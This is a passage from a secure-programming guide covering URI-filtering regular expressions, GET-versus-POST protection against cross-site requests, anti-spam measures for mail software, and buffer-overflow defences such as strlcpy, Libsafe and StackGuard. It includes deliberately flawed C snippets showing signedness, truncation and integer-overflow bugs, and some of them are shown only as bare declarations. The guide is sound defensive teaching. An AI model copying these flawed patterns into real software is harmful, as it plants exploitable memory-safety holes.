characters, which many poorly-written web applications are vulnerable to. In fact, with or without
URL escapes, many web applications are vulnerable to certain characters (such as backslash,
ampersand, etc.), but again this is difficult to generalize.
• Relative URIs: Relative URIs should be reasonably safe (if you manage the web site well), although in
some applications there’s no good reason to allow them either.
Of course, there is a trade-off with simplicity as well. Simple patterns are easier to understand, but they
aren’t very refined (so they tend to be too permissive or too restrictive, even more than a refined pattern).
Complex patterns can be more exact, but they are more likely to have errors, require more performance
to use, and can be hard to implement in some circumstances.
Here’s my suggestion for a “simple mostly safe” URI pattern which is very simple and can be
implemented “by hand” or through a regular expression; permit the following pattern:
(http|ftp|https)://[-A-Za-z0-9._/]+
This pattern doesn’t permit many potentially dangerous capabilities such as queries, fragments, ports, or
relative URIs, and it only permits a few schemes. It prevents the use of the “%” character, which is used
in URL escapes and can be used to specify characters that the server may not be prepared to handle.
Since it doesn’t permit either “:” or URL escapes, it doesn’t permit specifying port numbers, and even
using it to redirect to a more dangerous URI would be difficult (due to the lack of the escape character).
It also prevents the use of a number of other characters; again, many poorly-designed web applications
can’t handle a number of “unexpected” characters.
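As an illustration, this pattern can be checked with the POSIX regular expression routines; this is only a
sketch (the function name is mine), and note the ^ and $ anchors, since the entire URI must match the
pattern:

#include <regex.h>

/* Return 1 if uri matches the "simple mostly safe" pattern, else 0. */
int uri_is_simple_mostly_safe(const char *uri)
{
    static const char pattern[] = "^(http|ftp|https)://[-A-Za-z0-9._/]+$";
    regex_t re;
    int ok;

    if (regcomp(&re, pattern, REG_EXTENDED | REG_NOSUB) != 0)
        return 0;                        /* treat any failure as "not safe" */
    ok = (regexec(&re, uri, 0, NULL, 0) == 0);
    regfree(&re);
    return ok;
}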
Even this “mostly safe” URI permits a number of questionable URIs, such as subdirectories (via “/”) and
attempts to move up directories (via “..”); illegal queries of this kind should be caught by the server. It
permits some illegal host identifiers (e.g., “20.20”), though I know of no case where this would be a
security weakness. Some web applications treat subdirectories as query data (or worse, as command
data); this is hard to prevent in general since finding “all poorly designed web applications” is hopeless.
You could prevent the use of all paths, but this would make it impossible to reference most Internet
information. The pattern also allows references to local server information (through patterns such as
"http:///", "http://localhost/", and "http://127.0.0.1") and access to servers on an internal network; here
you’ll have to depend on the servers correctly interpreting the resulting HTTP GET request as solely a
request for information and not a request for an action, as recommended in Section 5.14. Since query
forms aren’t permitted by this pattern, in many environments this should be sufficient.
Unfortunately, the “mostly safe” pattern also prevents a number of quite legitimate and useful URIs. For
example, many web sites use the “?” character to identify specific documents (e.g., articles on a news
site). The “#” character is useful for specifying specific sections of a document, and permitting relative
URIs can be handy in a discussion. Various permitted characters and URL escapes aren’t included in the
“mostly safe” pattern. For example, without permitting URL escapes, it’s difficult to access many
non-English pages. If you truly need such functionality, then you can use less safe patterns, realizing that
you’re exposing your users to higher risk while giving your users greater functionality.
One pattern that permits queries, but at least limits the protocols and ports used is the following, which
I’ll call the “simple somewhat safe pattern”:
(http|ftp|https)://[-A-Za-z0-9._]+(\/([A-Za-z0-9\-\_\.\!\~\*\'\(\)\%\?]+))*/?
This pattern actually isn’t very smart, since it permits illegal escapes, multiple queries, queries in ftp, and
so on. It does have the advantage of being relatively simple.
Creating a “somewhat safe” pattern that really limits URIs to legal values is quite difficult. Here’s my
current attempt to do so, which I call the “sophisticated somewhat safe pattern”, expressed in a form
where whitespace is ignored and comments are introduced with "#":
(
(
# Handle http, https, and relative URIs:
((https?://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?))|
([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)?
((/([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path
(\?( # query:
(([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+=
([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+
(\&([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+=
([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*)
|
(([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+ # isindex
)
))?
(\#([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment
)|
# Handle ftp:
(ftp://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?)
((/([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path
(\#([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment
)
)
Even the sophisticated pattern shown above doesn’t forbid all illegal URIs. For example, again, "20.20"
isn’t a legal domain name, but it’s allowed by the pattern; however, to my knowledge this shouldn’t cause
any security problems. The sophisticated pattern forbids URL escapes that represent control characters
(e.g., %00 through %1F) - the smallest permitted escape value is %20 (ASCII space). Forbidding control
characters prevents some trouble, but it’s also limiting; change "2-9" to "0-9" everywhere if you need to
support sending all control characters to arbitrary web applications. This pattern does permit all other
URL escape values in paths, which is useful for international characters but could cause trouble for a few
systems which can’t handle it. The pattern at least prevents spaces, linefeeds, double-quotes, and other
dangerous characters from being in the URI, which prevents other kinds of attacks when incorporating
the URI into a generated document. Note that the pattern permits “+” in many places, since in practice
the plus is often used to replace the space character in queries and fragments.
Unfortunately, as noted above, there are attacks which can work through any technique that permit query
data, and there don’t seem to be really good defenses for them once you permit queries. So, you could
strip out the ability to use query data from the pattern above, but permit the other forms, producing a
“sophisticated mostly safe” pattern:
(
(
# Handle http, https, and relative URIs:
((https?://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?))|
([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)?
((/([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path
(\#([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment
)|
# Handle ftp:
(ftp://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?)
((/([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path
(\#([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment
)
)
As far as I can tell, as long as these patterns are only used to check hypertext anchors selected by the user
(the "<a>" tag) this approach also prevents the insertion of “web bugs”. Web bugs are simply text that
allow someone other than the originating web server of the main page to track information such as who
read the content and when they read it - see Section 8.7 for more information. This isn’t true if you use
the <img> (image) tag with the same checking rules - the image tag is loaded immediately, permitting
someone to add a “web bug”. Once again, this presumes that you’re not permitting any attributes; many
attributes can be quite dangerous and pierce the security you’re trying to provide.
Please note that all of these patterns require the entire URI match the pattern. An unfortunate fact of
these patterns is that they limit the allowable patterns in a way that forbids many useful ones (e.g., they
prevent the use of new URI schemes). Also, none of them can prevent the very real problem that some
web sites perform more than queries when presented with a query - and some of these web sites are
internal to an organization. As a result, no URI can really be safe until there are no web sites that accept
GET queries as an action (see Section 5.14). For more information about legal URLs/URIs, see IETF
RFC 2396; domain name syntax is further discussed in IETF RFC 1034.
link), or even just view a page (in the case of transcluded information such as images from HTML’s img
tag), the victim will perform a GET. When the GET is performed, all of the form data created by the
attacker will be sent by the victim to the link specified. This is a cross-site malicious content attack, as
discussed further in Section 7.16.
If the only action that a malicious cross-site content attack can perform is to make the user view
unexpected data, this isn’t as serious a problem. This can still be a problem, of course, since there are
some attacks that can be made using this capability. For example, there’s a potential loss of privacy due
to the user requesting something unexpected, possible real-world effects from appearing to request
illegal or incriminating material, or by making the user request the information in certain ways the
information may be exposed to an attacker in ways it normally wouldn’t be exposed. However, even
more serious effects can be caused if the malicious attacker can cause not just data viewing, but changes
in data, through a cross-site link.
Typical HTTP interfaces (such as most CGI libraries) normally hide the differences between GET and
POST, since for getting data it’s useful to treat the methods “the same way.” However, for actions that
actually cause something other than a data query, check to see if the request is something other than
POST; if it is, simply display a filled-in form with the data given and ask the user to confirm that they
really mean the request. This will prevent cross-site malicious content attacks, while still giving users the
convenience of confirming the action with a single click.
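A sketch of this check for a CGI program written in C follows (the messages and form handling are
illustrative); the key point is that anything other than a POST is answered with a confirmation form
rather than by performing the action:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void)
{
    const char *method = getenv("REQUEST_METHOD");

    if (method == NULL || strcmp(method, "POST") != 0) {
        /* Not a POST: do not perform the action.  Instead, echo the supplied
           parameters back as a filled-in form for the user to confirm. */
        printf("Content-Type: text/html\r\n\r\n");
        printf("<p>Please confirm this request by pressing Submit.</p>\n");
        /* ... emit a form (method="post") whose hidden fields repeat the
           request parameters ... */
        return 0;
    }
    /* It is a POST: perform the state-changing action here. */
    return 0;
}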
Indeed, this behavior is strongly recommended by the HTTP specification. According to the HTTP 1.1
specification (IETF RFC 2616 section 9.1.1), “the GET and HEAD methods SHOULD NOT have the
significance of taking an action other than retrieval. These methods ought to be considered ‘safe’. This
allows user agents to represent other methods, such as POST, PUT and DELETE, in a special way, so
that the user is made aware of the fact that a possibly unsafe action is being requested.”
In the interest of fairness, I should note that this doesn’t completely solve the problem, because on some
browsers (in some configurations) scripted posts can do the same thing. For example, imagine a web
browser with ECMAscript (Javascript) enabled receiving an HTML snippet containing a form that is
pre-filled and automatically submitted by a script - on some browsers, simply displaying such a snippet
will automatically force the user to send a POST request to a website chosen by the attacker, with form
data defined by the attacker. My thanks to David deVitry for pointing this out. However, although this
advice doesn’t solve all problems,
it’s still worth doing. In part, this is because the remaining problem can be solved by smarter web
browsers (e.g., by always confirming the data before allowing ECMAscript to send a web form) or by
web browser configuration (e.g., disabling ECMAscript). Also, this attack doesn’t work in many
cross-site scripting exploits, because many websites don’t allow users to post “script” commands but do
allow arbitrary URL links. Thus, limiting the actions a GET command can perform to queries
significantly improves web application security.
Spam is the usual name for unsolicited bulk email (UBE) or mass unsolicited email. It’s also sometimes
called unsolicited commercial email (UCE), though that name is misleading - not all spam is
commercial. For a discussion of why spam is such a serious problem and more general discussion about
it, see my essay at http://www.dwheeler.com/essays/stopspam.html, as well as http://mail-abuse.org/,
http://spam.abuse.net/, CAUCE, and IETF RFC 2635. Spam receivers and intermediaries bear most of
the cost of spam, while the spammer spends very little to send it. Therefore many people regard spam as
a theft of service, not just some harmless activity, and that number increases as the amount of spam
increases.
If your program can be used to generate email sent to others (such as a mail transfer agent, generator of
data sent by email, or a mailing list manager), be sure to write your program to prevent its unauthorized
use as a mail relay. A program should usually only allow legitimate authorized users to send email to
others (e.g., those inside that company’s mail server or those legitimately subscribed to the service).
More information about this is in IETF RFC 2505. Also, if you manage a mailing list, make sure that it
can enforce the rule that only subscribers can post to the list, and create a “log in” feature that will make
it somewhat harder for spammers to subscribe, spam, and unsubscribe easily.
One way to more directly counter spam is to incorporate support for the MAPS (Mail Abuse Prevention
System LLC) RBL (Realtime Blackhole List), which maintains in real-time a list of IP addresses where
spam is known to originate. For more information, see http://mail-abuse.org/rbl/. Many current Mail
Transfer Agents (MTAs) already support the RBL; see their websites for how to configure them. The
usual way to use the RBL is to simply refuse to accept any requests from IP addresses in the blackhole
list; this is harsh, but it solves the problem. Another similar service is the Open Relay Database (ORDB)
at http://ordb.org, which dynamically identifies those sites that permit open email relays (open email
relays are misconfigured email servers that allow spammers to send email through them). Another
location for more information is SPEWS. I believe there are other similar services as well.
I suggest that many systems and programs, by default, enable spam blocking if they can send email on to
others whose identity is under control of a remote user - and that includes MTAs. At the least, consider
this. There are real problems with this suggestion, of course - you might (rarely) inhibit communication
with a legitimate user. On the other hand, if you don’t block spam, then it’s likely that everyone else will
blackhole your system (and thus ignore your emails). It’s not a simple issue, because no matter what you
do, some people will not allow you to send them email. And of course, how well do you trust the
organization keeping up the real-time blackhole list - will they add truly innocent sites to the blackhole
list, and will they remove sites from the blackhole list once all is okay? Thus, it becomes a trade-off - is it
more important to talk to spammers (and a few innocents as well), or is it more important to talk to those
many other systems with spam blocks (losing those innocents who share equipment with spammers)?
Obviously, this must be configurable. This is somewhat controversial advice, so consider your options
for your circumstance.
Notes
1. Technically, a hypertext link can be any “uniform resource identifier” (URI). The term “Uniform
Resource Locator” (URL) refers to the subset of URIs that identify resources via a representation of
their primary access mechanism (e.g., their network "location"), rather than identifying the resource
by name or by some other attribute(s) of that resource. Many people use the term “URL” as
synonymous with “URI”, since URLs are the most common kind of URI. For example, the encoding
used in URIs is actually called “URL encoding”.
Chapter 6. Restrict Operations to Buffer
Bounds (Avoid Buffer Overflow)
An enemy will overrun the land; he will
pull down your strongholds and plunder
your fortresses.
Amos 3:11 (NIV)
Programs often use memory buffers to capture input and process data. In some cases (particularly in C or
C++ programs) it may be possible to perform an operation, but either read from or write to a memory
location that is outside of the intended boundary of the buffer. In many cases this can lead to an
extremely serious security vulnerability. This is such a common problem that it has a CWE identifier,
CWE-119. Exceeding buffer bounds is a problem with a program’s internal implementation, but it’s such
a common and serious problem that I’ve placed this information in its own chapter.
There are many variations of a failure to restrict operations to buffer bounds. A subcategory of exceeding
buffer bounds is a buffer overflow. The term buffer overflow has a number of varying definitions. For our
purposes, a buffer overflow occurs if a program attempts to write more data in a buffer than it can hold or
write into a memory area outside the boundaries of the buffer. A particularly common situation is writing
character data beyond the end of a buffer (through copying or generation). A buffer overflow can occur
when reading input from the user into a buffer, but it can also occur during other kinds of processing in a
program. Buffer overflows are also called buffer overruns. This subcategory is such a common problem
that it has its own CWE identifier, CWE-120.
Buffer overflows are an extremely common and dangerous security flaw, and in many cases a buffer
overflow can lead immediately to an attacker having complete control over the vulnerable program. To
give you an idea of how important this subject is, at the CERT, 9 of 13 advisories in 1998 and at least
half of the 1999 advisories involved buffer overflows. An informal 1999 survey on Bugtraq found that
approximately 2/3 of the respondents felt that buffer overflows were the leading cause of system security
vulnerability (the remaining respondents identified “mis-configuration” as the leading cause) [Cowan
1999]. This is an old, well-known problem, yet it continues to resurface [McGraw 2000].
Attacks that exploit a buffer overflow vulnerability are often named depending on where the buffer is,
e.g., a “stack smashing” attack attacks a buffer on the stack, while a “heap smashing” attack attacks a
buffer on the heap (memory that is allocated by operators such as malloc and new). More details can be
found from Aleph1 [1996], Mudge [1995], LSD [2001], or Nathan P. Smith’s Stack Smashing
Security Vulnerabilities website at http://destroy.net/machines/security/. A discussion of the problem and
some ways to counter them is given by Crispin Cowan et al, 2000, at
http://immunix.org/StackGuard/discex00.pdf. A discussion of the problem and some ways to counter
them in Linux is given by Pierre-Alain Fayolle and Vincent Glaume at
http://www.enseirb.fr/~glaume/indexen.html.
Allowing attackers to read data beyond a buffer boundary can also result in vulnerabilities, and this
weakness has its own identifier (CWE-125). For example, the Heartbleed vulnerability was this kind of
weakness. The Heartbleed vulnerability in OpenSSL allowed attackers to extract critically-important
data such as private keys, and then use them (e.g., so they could impersonate trusted sites).
Most high-level programming languages are essentially immune to exceeding buffer boundaries, either
because they automatically resize arrays (this applies to most languages such as Perl), or because they
normally detect and prevent buffer overflows (e.g., Ada95). However, the C language provides no
protection against such problems, and C++ can be easily used in ways to cause this problem too.
Assembly language and Forth also provide no protection, and some languages that normally include such
protection (e.g., C#, Ada, and Pascal) can have this protection disabled (for performance reasons). Even
if most of your program is written in another language, many library routines are written in C or C++, as
well as “glue” code to call them, so other languages often don’t provide as complete a protection from
buffer overflows as you’d like.
Here is an example (posted by Timo Sirainen) of a length-handling error involving signedness:
buf = malloc(len);
read(fd, buf, len); /* len cast to unsigned and overflows */
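For context, here is a self-contained sketch of this kind of signedness mistake (the MAXLEN bound and the
function are illustrative, not the original posting): a negative length passes the "too large" test and
then becomes an enormous unsigned value when handed to read():

#include <unistd.h>

#define MAXLEN 4096

int read_record(int fd)
{
    char buf[MAXLEN];
    int len;                          /* signed, and attacker-controlled */

    if (read(fd, &len, sizeof(len)) != sizeof(len))
        return -1;
    if (len > MAXLEN)                 /* WRONG: a negative len passes this test */
        return -1;
    read(fd, buf, len);               /* negative len converts to a huge size_t */
    return 0;                         /* the fix: also reject len < 0 */
}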
Here’s a second example identified by Timo Sirainen, involving integer size truncation. Sometimes the
different sizes of integers can be exploited to cause a buffer overflow. Basically, make sure that you don’t
truncate any integer results used to compute buffer sizes. Here’s Timo’s example for 64-bit architectures:
char *buf;
size_t len;
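A self-contained sketch of this truncation problem follows (the function and the 32-bit intermediate
variable are illustrative, not Timo’s original code): on a platform where size_t is 64 bits, storing the
length in a 32-bit variable makes the allocation and the later copy disagree about the size:

#include <stdlib.h>
#include <string.h>

int save_copy(const char *src, size_t len)   /* len is 64 bits wide here */
{
    unsigned int short_len = len;    /* WRONG: silently truncated to 32 bits */
    char *buf = malloc(short_len);   /* may allocate far fewer than len bytes */

    if (buf == NULL)
        return -1;
    memcpy(buf, src, len);           /* copies the full 64-bit len: overflow */
    free(buf);
    return 0;
}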
Here’s a third example from Timo Sirainen, involving integer overflow. This is particularly nasty when
combined with malloc(); an attacker may be able to create a situation where the computed buffer size is
less than the data to be placed in it. Here is Timo’s sample:
/* 3) integer overflow */
char *buf;
size_t len;
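Here is a similar self-contained sketch of the integer overflow case (the names are illustrative): adding 1
to an attacker-influenced length can wrap around to 0, so the buffer allocated is far smaller than the data
later written into it:

#include <stdlib.h>
#include <string.h>

int store_with_nul(const char *src, size_t len)   /* len is attacker-influenced */
{
    char *buf = malloc(len + 1);     /* WRONG: len == SIZE_MAX wraps to 0 */

    if (buf == NULL)
        return -1;
    memcpy(buf, src, len);           /* writes far more than was allocated */
    buf[len] = '\0';
    free(buf);
    return 0;                        /* the fix: reject absurdly large len first */
}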
With sprintf(), you can limit the length of a copied string by specifying a precision (not just a field width):
char buf[BUFFER_SIZE];
sprintf(buf, "%*s",  (int)(sizeof(buf)-1), "long-string"); /* WRONG: "*" is only a minimum field width */
sprintf(buf, "%.*s", (int)(sizeof(buf)-1), "long-string"); /* RIGHT: ".*" is a precision that limits the length */
In theory, sprintf() should be very helpful because you can use it to specify complex formats. Sadly, it’s
easy to get things wrong with sprintf(). If the format is complex, you need to make sure that the
destination is large enough for the largest possible size of the entire format, but the precision field only
controls the size of one parameter. The "largest possible" value is often hard to determine when a
complicated output is being created. If a program doesn’t allocate quite enough space for the longest
possible combination, a buffer overflow vulnerability may open up. Also, sprintf() appends a NUL to the
destination after the entire operation is complete - this extra character is easy to forget and creates an
opportunity for off-by-one errors. So, while this works, it can be painful to use in some circumstances.
Also, a quick note about the code above - note that the sizeof() operation used the size of an array. If the
code were changed so that “buf” was a pointer to some allocated memory, then all “sizeof()” operations
would have to be changed (or sizeof would just measure the size of a pointer, which isn’t enough space
for most values).
The scanf() family is sadly a little murky as well. An obvious question is whether or not the maximum
width value can be used in %s to prevent these attacks. There are multiple official specifications for
scanf(); some clearly state that the width parameter is the absolutely largest number of characters, while
others aren’t as clear. The biggest problem is implementations; modern implementations that I know of
do support maximum widths, but I cannot say with certainty that all libraries properly implement
maximum widths. The safest approach is to do things yourself in such cases. However, few will fault you
if you simply use scanf and include the widths in the format strings (but don’t forget to count \0, or you’ll
get the wrong length). If you do use scanf, it’s best to include a test in your installation scripts to ensure
that the library properly limits length.
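For example, a short sketch of using an explicit width with scanf (the buffer size is illustrative); the
width must be one less than the buffer size so there is room for the terminating \0:

char buf[51];                        /* room for 50 characters plus the \0 */

if (scanf("%50s", buf) != 1) {       /* width 50 == sizeof(buf) - 1 */
    /* handle missing or malformed input */
}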
• Imagine code that calls gethostbyname(3) and, if successful, immediately copies hostent->h_name to a
fixed-size buffer using strncpy or snprintf. Using strncpy or snprintf protects against an overflow of an
excessively long fully-qualified domain name (FQDN), so you might think you’re done. However, this
could result in chopping off the end of the FQDN. This may be very undesirable, depending on what
happens next.
• Imagine code that uses strncpy, strncat, snprintf, etc., to copy the full path of a filesystem object to
some buffer. Further imagine that the original value was provided by an untrusted user, and that the
copying is part of a process to pass a resulting computation to a function. Sounds safe, right? Now
imagine that an attacker pads a path with a large number of ’/’s at the beginning. This could result in
future operations being performed on the file “/”. If the program appends values in the belief that the
result will be safe, the program may be exploitable. Or, the attacker could devise a long filename near
the buffer length, so that attempts to append to the filename would silently fail to occur (or only
partially occur in ways that may be exploitable).
When using statically-allocated buffers, you really need to consider the length of the source and
destination arguments. Sanity checking the input and the resulting intermediate computation might deal
with this, too.
Another alternative is to dynamically reallocate all strings instead of using fixed-size buffers. This
general approach is recommended by the GNU programming guidelines, since it permits programs to
handle arbitrarily-sized inputs (until they run out of memory). Of course, the major problem with
dynamically allocated strings is that you may run out of memory. The memory may even be exhausted at
some other point in the program than the portion where you’re worried about buffer overflows; any
memory allocation can fail. Also, since dynamic reallocation may cause memory to be inefficiently
allocated, it is entirely possible to run out of memory even though technically there is enough virtual
memory available to the program to continue. In addition, before running out of memory the program
will probably use a great deal of virtual memory; this can easily result in “thrashing”, a situation in
which the computer spends all its time just shuttling information between the disk and memory (instead
of doing useful work). This can have the effect of a denial of service attack. Some rational limits on input
size can help here. In general, the program must be designed to fail safely when memory is exhausted if
you use dynamically allocated strings.
Both strlcpy and strlcat take the full size of the destination buffer as a parameter (not the maximum
number of characters to be copied) and guarantee to NIL-terminate the result (as long as size is larger
than 0). Remember that you should include a byte for NIL in the size.
The strlcpy function copies up to size-1 characters from the NUL-terminated string src to dst,
NIL-terminating the result. The strlcat function appends the NIL-terminated string src to the end of dst. It
will append at most size - strlen(dst) - 1 bytes, NIL-terminating the result.
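For instance, here is a short usage sketch (the function and names are illustrative); because both
functions return the length of the string they tried to create, comparing that value against the buffer
size detects truncation:

#include <string.h>     /* or your own copies, if the platform lacks strlcpy/strlcat */

int build_path(char *dst, size_t dstsize, const char *dir, const char *file)
{
    if (strlcpy(dst, dir, dstsize) >= dstsize)
        return -1;                   /* dir was too long: result truncated */
    if (strlcat(dst, file, dstsize) >= dstsize)
        return -1;                   /* combined result would not fit */
    return 0;
}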
One minor disadvantage of strlcpy(3) and strlcat(3) is that they are not, by default, installed in most
Unix-like systems. In OpenBSD, they are part of <string.h>. This is not that difficult a problem; since
they are small functions, you can even include them in your own program’s source (at least as an option),
and create a small separate package to load them. You can even use autoconf to handle this case
automatically. If more programs use these functions, it won’t be long before these are standard parts of
Linux distributions and other Unix-like systems. Also, these functions have been recently added to the
“glib” library (I submitted the patch to do this), so using recent versions of glib makes them available. In
glib these functions are named g_strlcpy and g_strlcat (not strlcpy or strlcat) to be consistent with the
glib library naming conventions.
Also, strlcat(3) has slightly varying semantics when the provided size is 0 or if there are no NIL
characters in the destination string dst (inside the given number of characters). In OpenBSD, if the size is
0, then the destination string’s length is considered 0. Also, if size is nonzero, but there are no NIL
characters in the destination string (in the size number of characters), then the length of the destination is
considered equal to the size. These rules make handling strings without embedded NILs consistent.
Unfortunately, at least Solaris doesn’t (at this time) obey these rules, because they weren’t specified in
the original documentation. I’ve talked to Todd Miller, and he and I agree that the OpenBSD semantics
are the correct ones (and that Solaris is incorrect). The reasoning is simple: under no condition should
strlcat or strlcpy ever examine characters in the destination outside of the range of size; such access
might cause core dumps (from accessing out-of-range memory) and even hardware interactions (through
memory-mapped I/O). Thus, given a call along the following lines (the particular strings and sizes are only illustrative):
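char dst[4] = "Y";                   /* strlen(dst) is 1; values are illustrative */
size_t n = strlcat(dst, "123", 0);   /* the size argument is 0 */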
The correct answer is 3 (0+3=3), but Solaris will claim the answer is 4 because it incorrectly looks at
characters beyond the "size" length in the destination. For now, I suggest avoiding cases where the size is
0 or the destination has no NIL characters. Future versions of glib will hide this difference and always
use the OpenBSD semantics.
A different approach is to use functions that allocate the result themselves, such as asprintf(3) and
vasprintf(3). Since these functions allocate memory, you must pass the resulting pointer to free(3) to
deallocate it. These functions return the number of bytes "printed" (and -1 if there is an error).
These functions are relatively simple to use, and in particular they don’t truncate results in the middle (a
problem with any fixed-length buffer solution). Here is an example:
char *result;
asprintf(&result, "x=%s and y=%s\n", x, y);
The asprintf() and vasprintf() functions are widely used to get things done in C without buffer overflows.
One problem with them is that they are not actually standard (they are not in C11). That said, they are
widely implemented; they are in the GNU C library and in the *BSDs (including Apple’s). They are also
relatively trivial to recreate on other systems, e.g., it’s possible to re-implement this on Windows with
less than 20 lines of code. There is some variation in error handling; FreeBSD sets strp to NULL on an
error, while others don’t; users should not depend on either behavior. Another problem is that their wide
use can easily lead to memory leaks; as with any C function that allocates memory, you must manually
deallocate the allocated memory.
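For example, here is a hedged sketch of such a portable re-implementation in terms of the standard C99
vsnprintf (this is not the official implementation, just one reasonable approximation; the name
my_asprintf is mine):

#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>

int my_asprintf(char **strp, const char *fmt, ...)
{
    va_list ap;
    int len;

    va_start(ap, fmt);
    len = vsnprintf(NULL, 0, fmt, ap);       /* measure the required length */
    va_end(ap);
    if (len < 0 || (*strp = malloc((size_t)len + 1)) == NULL) {
        *strp = NULL;
        return -1;
    }

    va_start(ap, fmt);
    len = vsnprintf(*strp, (size_t)len + 1, fmt, ap);
    va_end(ap);
    if (len < 0) {
        free(*strp);
        *strp = NULL;
        return -1;
    }
    return len;                              /* number of bytes "printed" */
}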
6.2.5. libmib
One toolset for C that dynamically reallocates strings automatically is the “libmib allocated string
functions” by Forrest J. Cavalier III, available at http://www.mibsoftware.com/libmib/astring. There are
two variations of libmib; “libmib-open” appears to be clearly open source under its own X11-like license
that permits modification and redistribution, but redistributions must choose a different name; however,
the developer states that it “may not be fully tested.” To continuously get libmib-mature, you must pay
for a subscription. The documentation is not open source, but it is freely available. If you are considering
the use of this library, you should also look at Messier and Viega’s Safestr library (discussed next).
6.2.8. Libsafe
Arash Baratloo, Timothy Tsai, and Navjot Singh (of Lucent Technologies) have developed Libsafe, a
wrapper of several library functions known to be vulnerable to stack smashing attacks. This wrapper
(which they call a kind of “middleware”) is a simple dynamically loaded library that contains modified
versions of C library functions such as strcpy(3). These modified versions implement the original
functionality, but in a manner that ensures that any buffer overflows are contained within the current
stack frame. Their initial performance analysis suggests that this library’s overhead is very small. Libsafe
papers and source code are available at http://www.research.avayalabs.com/project/libsafe. The Libsafe
source code is available under the completely open source LGPL license.
Libsafe’s approach appears somewhat useful. Libsafe should certainly be considered for inclusion by
Linux distributors, and its approach is worth considering by others as well. For example, I know that the
Mandrake distribution of Linux (version 7.1) includes it. However, from a software developer’s point of
view, Libsafe is a useful mechanism to support defense-in-depth, but it does not really prevent buffer
overflows. Here are several reasons why you shouldn’t depend just on Libsafe during code development:
• Libsafe only protects a small set of known functions with obvious buffer overflow issues. At the time
of this writing, this list is significantly shorter than the list of functions in this book known to have this
problem. It also won’t protect against code you write yourself (e.g., in a while loop) that causes buffer
overflows.
• Even if libsafe is installed in a distribution, the way it is installed impacts its use. The documentation
recommends setting LD_PRELOAD to cause libsafe’s protections to be enabled, but the problem is
that users can unset this environment variable... causing the protection to be disabled for programs
they execute!
• Libsafe only protects against buffer overflows of the stack onto the return address; you can still
overrun the heap or other variables in that procedure’s frame.
• Unless you can be assured that all deployed platforms will use libsafe (or something like it), you’ll
have to protect your program as though it wasn’t there.
• LibSafe seems to assume that saved frame pointers are at the beginning of each stack frame. This isn’t
always true. Compilers (such as gcc) can optimize away things, and in particular the option
"-fomit-frame-pointer" removes the information that libsafe seems to need. Thus, libsafe may fail to
work for some programs.
The libsafe developers themselves acknowledge that software developers shouldn’t just depend on
libsafe. In their words:
It is generally accepted that the best solution to buffer overflow attacks is to fix the defective programs.
However, fixing defective programs requires knowing that a particular program is defective. The true benefit of
using libsafe and other alternative security measures is protection against future attacks on programs that are
not yet known to be vulnerable.
but it’s not wise to use this technique as your sole defense. Many such tools only provide a partial
defense. More-complete defenses tend to be slower (and generally people choose to use C/C++ because
performance is important for their application). Also, for open source programs you cannot be certain
what tools will be used to compile the program; using the default “normal” compiler for a given system
might suddenly open security flaws.
Historically a very important tool is “StackGuard”, a modification of the standard GNU C compiler gcc.
StackGuard works by inserting a “guard” value (called a “canary”) in front of the return address; if a
buffer overflow overwrites the return address, the canary’s value (hopefully) changes and the system
detects this before using it. This is quite valuable, but note that this does not protect against buffer
overflows overwriting other values (which they may still be able to use to attack a system). There is work
to extend StackGuard to be able to add canaries to other data items, called “PointGuard”. PointGuard
will automatically protect certain values (e.g., function pointers and longjump buffers). However,
protecting other variable types using PointGuard requires specific programmer intervention (the
programmer has to identify which data values must be protected with canaries). This can be valuable, but
it’s easy to accidentally omit protection for a data value you didn’t think needed protection - but needs it
anyway. More information on StackGuard, PointGuard, and other alternatives is in Cowan [1999].
StackGuard inspired the development of many other run-time mechanisms to detect and counter attacks.
IBM has developed a stack protection system called ProPolice based on the ideas of StackGuard. IBM
doesn’t include the ProPolice name in its current website - it’s just called a "GCC extension for
protecting applications from stack-smashing attacks". However, it’s hard to talk about something without
using a name, so I’ll continue to use the name ProPolice. Like StackGuard, ProPolice is a GCC (Gnu
Compiler Collection) extension for protecting applications from stack-smashing attacks. Applications
written in C are protected by automatically inserting protection code into an application at compilation
time. ProPolice is slightly different than StackGuard, however, by adding three features: (1) reordering
local variables to place buffers after pointers (to avoid the corruption of pointers that could be used to
further corrupt arbitrary memory locations), (2) copying pointers in function arguments to an area
preceding local variable buffers (to prevent the corruption of pointers that could be used to further
